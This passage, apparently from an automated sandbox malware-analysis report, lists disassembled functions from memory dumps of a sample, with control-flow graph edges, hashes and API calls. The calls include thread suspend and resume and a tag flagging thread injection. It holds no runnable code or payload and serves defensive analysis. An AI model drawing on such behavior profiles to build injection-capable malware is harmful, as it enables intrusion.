7ffd9c1d3252-7ffd9c1d3259 246->249 254 7ffd9c1d351b-7ffd9c1d3528 247->254 255 7ffd9c1d3597-7ffd9c1d35b8 247->255 251 7ffd9c1d325b-7ffd9c1d325f 249->251 252 7ffd9c1d31dc-7ffd9c1d3549 249->252 251->206 256 7ffd9c1d3265 251->256 252->247 257 7ffd9c1d3728 255->257 258 7ffd9c1d32e3-7ffd9c1d32e6 256->258 257->257 259 7ffd9c1d32e9-7ffd9c1d32f0 258->259 260 7ffd9c1d32f6 259->260 261 7ffd9c1d3267-7ffd9c1d329c call 7ffd9c1d2ef0 259->261 262 7ffd9c1d3366-7ffd9c1d336d 260->262 261->247 269 7ffd9c1d32a2-7ffd9c1d32b2 261->269 264 7ffd9c1d32f8-7ffd9c1d332a call 7ffd9c1d2ef0 262->264 265 7ffd9c1d336f-7ffd9c1d33b5 262->265 264->247 272 7ffd9c1d3330-7ffd9c1d3358 264->272 280 7ffd9c1d33bb-7ffd9c1d33c0 265->280 281 7ffd9c1d3184-7ffd9c1d3188 265->281 269->206 271 7ffd9c1d32b8-7ffd9c1d32d5 269->271 271->247 274 7ffd9c1d32db-7ffd9c1d32e0 271->274 272->247 275 7ffd9c1d335e-7ffd9c1d3363 272->275 274->258 275->262 284 7ffd9c1d3446-7ffd9c1d344a 280->284 282 7ffd9c1d31da 281->282 283 7ffd9c1d318a-7ffd9c1d3515 281->283 282->249 283->254 286 7ffd9c1d33c5-7ffd9c1d33f4 call 7ffd9c1d2ef0 284->286 287 7ffd9c1d3450-7ffd9c1d3456 284->287 286->247 290 7ffd9c1d33fa-7ffd9c1d340a 286->290 287->248 290->227 291 7ffd9c1d3410-7ffd9c1d341f 290->291 291->247 292 7ffd9c1d3425-7ffd9c1d3438 291->292 292->259 293 7ffd9c1d343e-7ffd9c1d3443 292->293 293->284
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52acdd696e716e8850ef65439d4dcf7824839837954551292e14b6caae5d2ba0
                                                            • Instruction ID: 44467dd739176d168030bfb2556addbe188c90b34700a112074dd3c8add8e1d7
                                                            • Opcode Fuzzy Hash: 52acdd696e716e8850ef65439d4dcf7824839837954551292e14b6caae5d2ba0
                                                            • Instruction Fuzzy Hash: 5452B131E1860A8FDB6DCF58C4A06B877B1FF59300F5046BDD45EDB28ADA38A981CB45
                                                            Function 00007FFD9BAD0D73 Relevance: .3, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42bfe5eff936705b2645dcf41a77ae5687caf2e35b6c8f7830da4980e9240aa4
                                                            • Instruction ID: 1494d7e4a56bb865ee03fd54f3cef6162bccb8b390021829fb228a2a874db836
                                                            • Opcode Fuzzy Hash: 42bfe5eff936705b2645dcf41a77ae5687caf2e35b6c8f7830da4980e9240aa4
                                                            • Instruction Fuzzy Hash: 35A1A071A19A4D8FE798DB68D8657A97FE1FF99314F01027ED009D76E6CBB42802CB40
                                                            Function 00007FFD9C410158 Relevance: 6.4, Strings: 5, Instructions: 123COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ^A9$^F9$^K9$^P9$^U9
                                                            • API String ID: 0-197665077
                                                            • Opcode ID: 7bf405c34d348f122a7651c16ccc6d989576d10987410371fecdf269c43c2b2d
                                                            • Instruction ID: 391666a9555b39d6a23d4656d33a33f90239e92d73ec1355a940be13986d942e
                                                            • Opcode Fuzzy Hash: 7bf405c34d348f122a7651c16ccc6d989576d10987410371fecdf269c43c2b2d
                                                            • Instruction Fuzzy Hash: 0F419130F0C51A8FEB64EB148865BA977B0EF68319F4001FAD05DE7295DE39A985CF81
                                                            Function 00007FFD9BAD0B47 Relevance: 2.6, Strings: 2, Instructions: 70COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 34 7ffd9bad0b47-7ffd9bad0b49 35 7ffd9bad0b4b-7ffd9bad0b62 34->35 36 7ffd9bad0b84-7ffd9bae7e21 34->36 35->36 38 7ffd9bae7e28-7ffd9bae7e40 36->38 39 7ffd9bae7e23 36->39 40 7ffd9bae7e46-7ffd9bae7e51 38->40 39->38
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9
                                                            • API String ID: 0-3254877420
                                                            • Opcode ID: fcf26b013bf8264b5778622fc6e3c703278fbca1aec745ba607a6dde5134c84f
                                                            • Instruction ID: 5cbe41d563a90c29ae8f328b12cf2d3e1ca6e6316115b2b1c980b7446f5820ed
                                                            • Opcode Fuzzy Hash: fcf26b013bf8264b5778622fc6e3c703278fbca1aec745ba607a6dde5134c84f
                                                            • Instruction Fuzzy Hash: 1811D332A2864D8FCB45DF5CD8555E9B7A0FF55325F1102BAE84DD3261C330A965CBC1
                                                            Function 00007FFD9BC7EDFC Relevance: 1.7, APIs: 1, Instructions: 159threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 41 7ffd9bc7edfc-7ffd9bc7ee31 42 7ffd9bc7ee34-7ffd9bc7ef02 ResumeThread 41->42 43 7ffd9bc7ee33 41->43 47 7ffd9bc7ef04 42->47 48 7ffd9bc7ef0a-7ffd9bc7ef54 42->48 43->42 47->48
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 190ce302e5b76c4223787ceab72f730485d47fa001552daadfdc064ff844e3ca
                                                            • Instruction ID: 920e1f1169eb07a561e830610bc8365415dad356b36eb31a593d423228a2f05f
                                                            • Opcode Fuzzy Hash: 190ce302e5b76c4223787ceab72f730485d47fa001552daadfdc064ff844e3ca
                                                            • Instruction Fuzzy Hash: 4E517B7090D78C8FDB55DFA8C894AE9BFF0EF1A310F0441ABD049DB692DA349846CB51
                                                            Function 00007FFD9BC7EF59 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: eb483597fc94340a002277024e56fdc1a7c6d276ea26ccbbc2b310519af6c8a3
                                                            • Instruction ID: c07b1dc5b1fc6f628ba30555940423da8d64d6ff5886f135fa5ad04c35ec9c18
                                                            • Opcode Fuzzy Hash: eb483597fc94340a002277024e56fdc1a7c6d276ea26ccbbc2b310519af6c8a3
                                                            • Instruction Fuzzy Hash: E4415D70D0865C8FDB59DFA8C895BEDBBF0EF5A310F1041AAD449D7292DA349885CB41
                                                            Function 00007FFD9BC7D6BD Relevance: 1.6, APIs: 1, Instructions: 137threadinjectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 61 7ffd9bc7d6bd-7ffd9bc7d6c9 62 7ffd9bc7d6d4-7ffd9bc7d7a2 SuspendThread 61->62 63 7ffd9bc7d6cb-7ffd9bc7d6d3 61->63 67 7ffd9bc7d7a4 62->67 68 7ffd9bc7d7aa-7ffd9bc7d7f4 62->68 63->62 67->68
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: SuspendThread
                                                            • String ID:
                                                            • API String ID: 3178671153-0
                                                            • Opcode ID: 761276c85f6fadfb52c52a6e5392a1e1ef176ea32c83e9ac6d668249a77b0e3b
                                                            • Instruction ID: ed2d605c9e516d9d3e2e5dcf36a5d34445ef0161a9e1e97367eed2a5838098de
                                                            • Opcode Fuzzy Hash: 761276c85f6fadfb52c52a6e5392a1e1ef176ea32c83e9ac6d668249a77b0e3b
                                                            • Instruction Fuzzy Hash: C6415C70E0864C8FDB58DFA8D899BEDBBF0FF5A310F10416AD049E7296DA70A845CB41
                                                            Function 00007FFD9BC80BA5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 71 7ffd9bc80ba5-7ffd9bc80c83 GetFileAttributesW 75 7ffd9bc80c8b-7ffd9bc80cc9 71->75 76 7ffd9bc80c85 71->76 76->75
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 652815b13e0e176822d3a093723186e74d5d5d0561ad66d136569d4fa148bb46
                                                            • Instruction ID: daf9e9c250e1fe32bdd4ac02dcdc3071384be272372e740af768c117542fd69e
                                                            • Opcode Fuzzy Hash: 652815b13e0e176822d3a093723186e74d5d5d0561ad66d136569d4fa148bb46
                                                            • Instruction Fuzzy Hash: 83411970E08A1C8FDB98DF98D895BEDBBF0FB59310F10416AD049E7251DA70A885CF41
                                                            Function 00007FFD9C1DE8E8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: e551ad0c5ffb21e4ebd16ef6cce4c253647d004fb6b133cd6ce5759ece163711
                                                            • Instruction ID: fc41e58c432a3f16320d17d5e4e5b5ebafd5ee837c46b42dcf25e14512a3ef69
                                                            • Opcode Fuzzy Hash: e551ad0c5ffb21e4ebd16ef6cce4c253647d004fb6b133cd6ce5759ece163711
                                                            • Instruction Fuzzy Hash: 77517972E0960F8FDB68DB98C4A05FDB7B0FF49381F1142BAD01AE7286DA346945CB44
                                                            Function 00007FFD9C1D28E8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 112 7ffd9c1d28e8-7ffd9c1d2900 114 7ffd9c1d2908-7ffd9c1d2933 112->114 118 7ffd9c1d295c-7ffd9c1d2962 114->118 119 7ffd9c1d2969-7ffd9c1d296f 118->119 120 7ffd9c1d2935-7ffd9c1d294e 119->120 121 7ffd9c1d2971-7ffd9c1d2976 119->121 124 7ffd9c1d2a45-7ffd9c1d2a55 120->124 125 7ffd9c1d2954-7ffd9c1d2959 120->125 122 7ffd9c1d297c-7ffd9c1d29b1 121->122 123 7ffd9c1d2863-7ffd9c1d28a8 121->123 123->119 128 7ffd9c1d28ae-7ffd9c1d28b4 123->128 133 7ffd9c1d2a57 124->133 134 7ffd9c1d2a58-7ffd9c1d2a67 124->134 125->118 130 7ffd9c1d2865-7ffd9c1d2a3d 128->130 131 7ffd9c1d28b6 128->131 130->124 135 7ffd9c1d28df-7ffd9c1d28e6 131->135 133->134 135->112 137 7ffd9c1d28b8-7ffd9c1d28d1 135->137 137->124 139 7ffd9c1d28d7-7ffd9c1d28dc 137->139 139->135
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 82a40e241cfbacf8a78b7ff90a066c499aca0586d29b4475b30728f087e9bacc
                                                            • Instruction ID: 0ca35eceeefe28ad2813b4e8fc6bd08396a5a6bc5d520b32afd277f452178b60
                                                            • Opcode Fuzzy Hash: 82a40e241cfbacf8a78b7ff90a066c499aca0586d29b4475b30728f087e9bacc
                                                            • Instruction Fuzzy Hash: CC414831E0860A8FDB69DBE4C4A05FDB7B1FF59304F1041BED02AA7696DA396942CB04
                                                            Function 00007FFD9BD239FF Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 140 7ffd9bd239ff-7ffd9bd23a01 141 7ffd9bd23a62 140->141 142 7ffd9bd23a03-7ffd9bd23a1e 140->142 143 7ffd9bd23a64 141->143 142->141 145 7ffd9bd23a6f-7ffd9bd23b56 143->145 155 7ffd9bd23b57 145->155 155->155
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4226680419.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bd20000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e
                                                            • API String ID: 0-4024072794
                                                            • Opcode ID: 499620cadf0bb6ddeae425572cfc0f0ff75692be0c2b752b0836150ccee530ec
                                                            • Instruction ID: 362fc9652447033bacb286fba03a5c505e0194055f72617b2c1b1ad6791a645c
                                                            • Opcode Fuzzy Hash: 499620cadf0bb6ddeae425572cfc0f0ff75692be0c2b752b0836150ccee530ec
                                                            • Instruction Fuzzy Hash: F7318371A1DA4A8FEB68DF48C8A1D68B7E1FF58314F0401F9E00DD7696DA34A981CB42
                                                            Function 00007FFD9C1DCCF8 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 156 7ffd9c1dccf8-7ffd9c1dcd23 157 7ffd9c1dd007-7ffd9c1dd029 156->157 158 7ffd9c1dd032-7ffd9c1dd033 157->158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 1d3141b850fee46d7565575adfd9924f6b4a2b20909a5f310ebf131e68df178a
                                                            • Instruction ID: e2fe7731cd961e563a53b18f7141029ed9d98523b0dce1010783067e94d19b64
                                                            • Opcode Fuzzy Hash: 1d3141b850fee46d7565575adfd9924f6b4a2b20909a5f310ebf131e68df178a
                                                            • Instruction Fuzzy Hash: 7C01A870A08A5DCFDF55DB98C894AACBBB1FF69345F20019DC00AEB651CA71A842DF00
                                                            Function 00007FFD9C1DADA0 Relevance: .7, Instructions: 696COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 294 7ffd9c1dada0-7ffd9c1dadba 295 7ffd9c1db3bc-7ffd9c1db3c2 294->295 296 7ffd9c1dadc0-7ffd9c1dadd0 294->296 297 7ffd9c1db348 295->297 298 7ffd9c1db3c3-7ffd9c1db3ca 295->298 299 7ffd9c1db41a-7ffd9c1db430 296->299 300 7ffd9c1dadd6-7ffd9c1dae11 296->300 303 7ffd9c1db34a-7ffd9c1db34d 297->303 301 7ffd9c1db3cc-7ffd9c1db3cd 298->301 302 7ffd9c1db3d1-7ffd9c1db3e0 298->302 309 7ffd9c1db47a-7ffd9c1db48d 299->309 310 7ffd9c1db432-7ffd9c1db456 299->310 308 7ffd9c1daeaa-7ffd9c1daeb2 300->308 313 7ffd9c1db3ce 301->313 304 7ffd9c1db34e-7ffd9c1db377 303->304 324 7ffd9c1db379-7ffd9c1db399 304->324 311 7ffd9c1dae16-7ffd9c1dae1f 308->311 312 7ffd9c1daeb8 308->312 311->299 316 7ffd9c1dae25-7ffd9c1dae30 311->316 315 7ffd9c1daec2-7ffd9c1daedf 312->315 313->313 317 7ffd9c1db3d0 313->317 321 7ffd9c1daee6-7ffd9c1daef7 315->321 318 7ffd9c1daeba-7ffd9c1daebe 316->318 319 7ffd9c1dae36-7ffd9c1dae4a 316->319 317->302 318->315 322 7ffd9c1dae4c-7ffd9c1dae63 319->322 323 7ffd9c1daea3-7ffd9c1daea7 319->323 330 7ffd9c1daef9-7ffd9c1daf0e 321->330 331 7ffd9c1daf10-7ffd9c1daf1f 321->331 322->299 325 7ffd9c1dae69-7ffd9c1dae75 322->325 323->308 334 7ffd9c1db39d-7ffd9c1db3aa 324->334 327 7ffd9c1dae77-7ffd9c1dae8b 325->327 328 7ffd9c1dae8f-7ffd9c1daea0 325->328 327->322 332 7ffd9c1dae8d 327->332 328->323 330->331 339 7ffd9c1daf41-7ffd9c1dafae 331->339 340 7ffd9c1daf21-7ffd9c1daf3c 331->340 332->323 336 7ffd9c1db3ac-7ffd9c1db3b6 334->336 336->296 337 7ffd9c1db3bb 336->337 337->295 347 7ffd9c1dafb0-7ffd9c1dafc3 339->347 348 7ffd9c1dafff-7ffd9c1db046 339->348 340->324 347->299 350 7ffd9c1dafc9-7ffd9c1daff7 347->350 353 7ffd9c1db04a-7ffd9c1db06b 348->353 355 7ffd9c1daff8-7ffd9c1daffd 350->355 358 7ffd9c1db0dc-7ffd9c1db0ed 353->358 359 7ffd9c1db06d-7ffd9c1db071 353->359 355->347 356 7ffd9c1daffe 355->356 356->348 360 7ffd9c1db0ee-7ffd9c1db0f1 358->360 359->355 362 7ffd9c1db073 359->362 363 7ffd9c1db0f7-7ffd9c1db0fb 360->363 364 7ffd9c1db09c-7ffd9c1db0ad 362->364 365 7ffd9c1db0fd-7ffd9c1db0ff 363->365 364->363 371 7ffd9c1db0af-7ffd9c1db0bd 364->371 366 7ffd9c1db149-7ffd9c1db151 365->366 367 7ffd9c1db101-7ffd9c1db10f 365->367 369 7ffd9c1db19b-7ffd9c1db1a3 366->369 370 7ffd9c1db153-7ffd9c1db15c 366->370 372 7ffd9c1db111-7ffd9c1db115 367->372 373 7ffd9c1db180-7ffd9c1db195 367->373 378 7ffd9c1db1a9-7ffd9c1db1c2 369->378 379 7ffd9c1db22b-7ffd9c1db239 369->379 374 7ffd9c1db15f-7ffd9c1db161 370->374 375 7ffd9c1db12e-7ffd9c1db143 371->375 376 7ffd9c1db0bf-7ffd9c1db0c3 371->376 372->364 383 7ffd9c1db117 372->383 373->369 380 7ffd9c1db1d2-7ffd9c1db1d4 374->380 381 7ffd9c1db163-7ffd9c1db165 374->381 375->366 376->353 390 7ffd9c1db0c5 376->390 378->379 384 7ffd9c1db1c4-7ffd9c1db1c5 378->384 385 7ffd9c1db2aa-7ffd9c1db2ab 379->385 386 7ffd9c1db23b-7ffd9c1db23d 379->386 395 7ffd9c1db1d5-7ffd9c1db1d7 380->395 388 7ffd9c1db167 381->388 389 7ffd9c1db1e1-7ffd9c1db1e5 381->389 383->375 392 7ffd9c1db1c6-7ffd9c1db1d0 384->392 391 7ffd9c1db2db-7ffd9c1db2dd 385->391 393 7ffd9c1db2b9-7ffd9c1db2bb 386->393 394 7ffd9c1db23f 386->394 388->360 396 7ffd9c1db169 388->396 397 7ffd9c1db1e7 389->397 398 7ffd9c1db261-7ffd9c1db27b 389->398 390->358 391->304 399 7ffd9c1db2df 391->399 392->380 400 7ffd9c1db32c 393->400 401 7ffd9c1db2bd-7ffd9c1db2bf 393->401 394->392 402 7ffd9c1db241 394->402 415 7ffd9c1db258-7ffd9c1db260 395->415 416 7ffd9c1db1d8 395->416 405 7ffd9c1db16e-7ffd9c1db174 396->405 397->405 406 7ffd9c1db1e9 397->406 427 7ffd9c1db2ad-7ffd9c1db2b6 398->427 428 7ffd9c1db27d-7ffd9c1db28b 398->428 407 7ffd9c1db2fc-7ffd9c1db30a 399->407 400->334 408 7ffd9c1db32e-7ffd9c1db330 400->408 409 7ffd9c1db33b-7ffd9c1db33f 401->409 410 7ffd9c1db2c1 401->410 403 7ffd9c1db248-7ffd9c1db24c 402->403 412 7ffd9c1db2c8-7ffd9c1db2ce 403->412 413 7ffd9c1db24e 403->413 419 7ffd9c1db1f0-7ffd9c1db215 405->419 426 7ffd9c1db176 405->426 406->419 420 7ffd9c1db30b-7ffd9c1db315 407->420 408->336 421 7ffd9c1db332 408->421 409->337 414 7ffd9c1db341 409->414 410->403 411 7ffd9c1db2c3 410->411 411->412 412->303 431 7ffd9c1db2d0 412->431 413->395 423 7ffd9c1db250 413->423 414->412 424 7ffd9c1db343 414->424 415->398 416->374 425 7ffd9c1db1d9-7ffd9c1db1da 416->425 437 7ffd9c1db218-7ffd9c1db229 419->437 429 7ffd9c1db317-7ffd9c1db32a 420->429 421->393 430 7ffd9c1db334 421->430 423->415 424->297 425->389 426->365 432 7ffd9c1db178 426->432 427->393 428->407 433 7ffd9c1db28d-7ffd9c1db28f 428->433 429->400 430->409 431->429 435 7ffd9c1db2d2-7ffd9c1db2da 431->435 432->373 433->420 436 7ffd9c1db291 433->436 435->391 436->437 439 7ffd9c1db293 436->439 437->379 437->384 439->385
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bba30e6c000cb0fa2c920cf5210404ac340a621615c0fad12c9565a808ddba5
                                                            • Instruction ID: 2f7853e0fa1d532f7abde0371ff659774ce5d7f9315a4088bec2bf9fa7c37161
                                                            • Opcode Fuzzy Hash: 9bba30e6c000cb0fa2c920cf5210404ac340a621615c0fad12c9565a808ddba5
                                                            • Instruction Fuzzy Hash: 0332A831F08A1A8FDBA8DB58C865A6877F1FF54350F5042B9D01EDB292DE24EC85CB85
                                                            Function 00007FFD9C1DC4F5 Relevance: .4, Instructions: 413COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37ea0f0729297f7b6c525e18991883e0eab6c356de5aba047dae08f991186c0d
                                                            • Instruction ID: 5fd72cd28876b26b877fb4702cd39ee525635eac59f7018e8fcf6a29d0ec33f3
                                                            • Opcode Fuzzy Hash: 37ea0f0729297f7b6c525e18991883e0eab6c356de5aba047dae08f991186c0d
                                                            • Instruction Fuzzy Hash: D7D11722F0DA8B4FD7A5DB6884746B877F1EF99390F4506BAD00DD72E2EE18A805C345
                                                            Function 00007FFD9C1DEB7A Relevance: .4, Instructions: 383COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 520 7ffd9c1deb7a-7ffd9c1deb88 521 7ffd9c1deb8e-7ffd9c1deb9f 520->521 522 7ffd9c1deebf-7ffd9c1def00 520->522 523 7ffd9c1debb5-7ffd9c1debbc 521->523 524 7ffd9c1deba1-7ffd9c1deba5 521->524 536 7ffd9c1def0b-7ffd9c1defa1 522->536 527 7ffd9c1deb74-7ffd9c1deeb5 523->527 528 7ffd9c1debbe-7ffd9c1debd4 523->528 524->522 525 7ffd9c1debab-7ffd9c1debb3 524->525 525->523 527->522 531 7ffd9c1debda-7ffd9c1debe2 528->531 532 7ffd9c1dec64-7ffd9c1dec94 528->532 531->522 533 7ffd9c1debe8-7ffd9c1debfa 531->533 542 7ffd9c1dec9a-7ffd9c1dec9b 532->542 543 7ffd9c1ded3e-7ffd9c1ded47 532->543 533->522 535 7ffd9c1dec00-7ffd9c1dec17 533->535 537 7ffd9c1dec19-7ffd9c1dec20 535->537 538 7ffd9c1dec57-7ffd9c1dec5e 535->538 547 7ffd9c1defac-7ffd9c1df033 536->547 548 7ffd9c1def26-7ffd9c1defa6 536->548 537->522 541 7ffd9c1dec26-7ffd9c1dec54 537->541 538->531 538->532 541->538 549 7ffd9c1dec9e-7ffd9c1decb4 542->549 545 7ffd9c1ded4d-7ffd9c1ded53 543->545 546 7ffd9c1dee7f-7ffd9c1dee85 543->546 545->522 550 7ffd9c1ded59-7ffd9c1ded68 545->550 551 7ffd9c1dee0b-7ffd9c1dee0f 546->551 552 7ffd9c1dee87-7ffd9c1dee8d 546->552 582 7ffd9c1df035-7ffd9c1df475 547->582 583 7ffd9c1df088-7ffd9c1df498 547->583 548->547 565 7ffd9c1def48-7ffd9c1defa8 548->565 549->522 554 7ffd9c1decba-7ffd9c1decde 549->554 556 7ffd9c1dee72-7ffd9c1dee79 550->556 557 7ffd9c1ded6e-7ffd9c1ded75 550->557 563 7ffd9c1dee12-7ffd9c1dee2f 551->563 558 7ffd9c1dee94-7ffd9c1deea5 552->558 559 7ffd9c1dee8f 552->559 561 7ffd9c1ded31-7ffd9c1ded38 554->561 562 7ffd9c1dece0-7ffd9c1ded03 call 7ffd9c1d7808 554->562 556->545 556->546 557->522 564 7ffd9c1ded7b-7ffd9c1ded87 call 7ffd9c1d7808 557->564 559->558 561->543 561->549 562->522 577 7ffd9c1ded09-7ffd9c1ded2f 562->577 563->522 568 7ffd9c1dee35-7ffd9c1dee50 563->568 575 7ffd9c1ded8c-7ffd9c1ded97 564->575 565->547 580 7ffd9c1def6c-7ffd9c1defaa 565->580 568->563 569 7ffd9c1dee52-7ffd9c1dee68 568->569 569->522 573 7ffd9c1dee6a-7ffd9c1dee6e 569->573 573->556 578 7ffd9c1ded99-7ffd9c1dedb0 575->578 579 7ffd9c1dedd6-7ffd9c1dede5 575->579 577->561 577->562 578->522 584 7ffd9c1dedb6-7ffd9c1dedd2 578->584 579->522 585 7ffd9c1dedeb-7ffd9c1dee0a 579->585 580->547 592 7ffd9c1def8d-7ffd9c1defa0 580->592 584->578 590 7ffd9c1dedd4 584->590 585->551 590->569
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d6874b7b66dafd7b4156b914fedd3ac3fdcedbda20285fe9bdde2d1dae0b489
                                                            • Instruction ID: 4ab9f65b1c09b978d945fd4b91135768a7e2503c60a74f59de6fc7a60a239ff2
